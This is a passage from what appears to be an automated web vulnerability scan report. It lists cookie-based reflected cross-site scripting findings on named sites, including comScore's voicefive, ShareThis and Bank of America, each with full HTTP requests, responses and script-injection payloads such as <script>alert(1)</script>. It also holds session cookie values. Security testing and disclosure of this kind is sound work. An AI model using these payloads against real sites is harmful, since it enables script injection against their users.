41023&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-130334904622b9a<script>alert(1)</script>2f6897011f9', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

4.58. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload bdd23<script>alert(1)</script>c65f51aafdf was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&bdd23<script>alert(1)</script>c65f51aafdf; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:16 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:16 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:16 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&bdd23<script>alert(1)</script>c65f51aafdf', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

4.59. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 5d13e<script>alert(1)</script>263d747e74f was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5d13e<script>alert(1)</script>263d747e74f; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:16 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:16 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:16 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
Apr 25 14:20:50 2011&prad=253732017&arc=194941023&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5d13e<script>alert(1)</script>263d747e74f', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...

4.60. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 44c04<script>alert(1)</script>db3d641228c was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&44c04<script>alert(1)</script>db3d641228c; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:15 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:15 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:15 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&44c04<script>alert(1)</script>db3d641228c', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobu
...[SNIP]...

4.61. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 934b1<script>alert(1)</script>b9c17a19ff1 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&934b1<script>alert(1)</script>b9c17a19ff1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:17 2011&934b1<script>alert(1)</script>b9c17a19ff1=&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827677; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&934b1<script>alert(1)</script>b9c17a19ff1', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "a
...[SNIP]...

4.62. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload b0db8<script>alert(1)</script>b0d978f9552 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1b0db8<script>alert(1)</script>b0d978f9552; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:17 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827677; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
ne:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&', "ar_s_p81479006": '1b0db8<script>alert(1)</script>b0d978f9552', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&ini
...[SNIP]...

4.63. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 21b12<script>alert(1)</script>d71cda52c54 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&jsref=&rnd=1303775074503 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==21b12<script>alert(1)</script>d71cda52c54; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 25 Apr 2011 23:45:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==21b12<script>alert(1)</script>d71cda52c54
userid:
</div>
...[SNIP]...

4.64. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /weblinking/flyout/HM_Arrays.js

Issue detail

The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d7fa"><script>alert(1)</script>c094ae10236 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /weblinking/flyout/HM_Arrays.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; state=MA4d7fa"><script>alert(1)</script>c094ae10236; CFID=132569126; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; GEOSERVER=2; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:56 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Content-Length: 13458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...
<a href="http://www.bankofamerica.com/contact/?state=MA4d7fa"><script>alert(1)</script>c094ae10236">
...[SNIP]...

4.65. https://www.bankofamerica.com/privacy [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f662a'%3balert(1)//d027475f5ab was submitted in the state cookie. This input was echoed as f662a';alert(1)//d027475f5ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MAf662a'%3balert(1)//d027475f5ab; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; 